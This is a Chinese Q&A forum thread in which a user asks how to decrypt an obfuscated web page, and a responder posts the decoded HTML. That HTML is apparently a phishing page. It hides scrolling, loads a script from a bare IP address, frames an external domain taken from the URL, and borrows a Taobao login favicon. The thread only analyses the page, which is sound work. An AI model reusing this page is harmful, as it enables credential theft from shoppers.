求解密这个加密html网页 t=eval("String.fromCharCode("+t+")"); document.write(t)
发布网友
发布时间:2022-05-24 12:37
我来回答
共1个回答
热心网友
时间:2023-10-13 15:27
<style>html{overflow:hidden;}body{height:100%;margin:0px;}</style></head><body scroll="no">
<iframe id="iframe" height="100%" width="100%" frameborder="0"></iframe>
<script src='http://121.10.130.25:701/Pus/pustest1.js'></script>
<script language="javascript">
var pos,str,para,url;
str = window.location.href;
pos = str.indexOf("?") ;
url = str.substring(pos+1);
if (pos>0){
n='http://onmd.ahtth.com//';
j1=n+url;
c='<link rel="shortcut icon" href="https://s.tbcdn.cn/apps/login/static/img/favicon.ico" type="image/x-icon" />';
b='<html><head><style>html{overflow:hidden;}body{height:100%;margin:0px;}</style></head><body scroll="no">';
a='<iframe name="main" height="100%" src="';
k1='" width="100%" frameborder="0"></iframe>';
var d = window.frames[0];
d.document.write(c+b+a+j1+k1);
}
else
{
}
</script>追问你好,能说下解密方法吗?谢谢了
追答这个说来话长啊...
他是经过三重加密的.
把你那个字符串解密以后会又得到一个加密的字符串,然后再解密又得到一个加密的字符串,然后再解密得到上面的那串.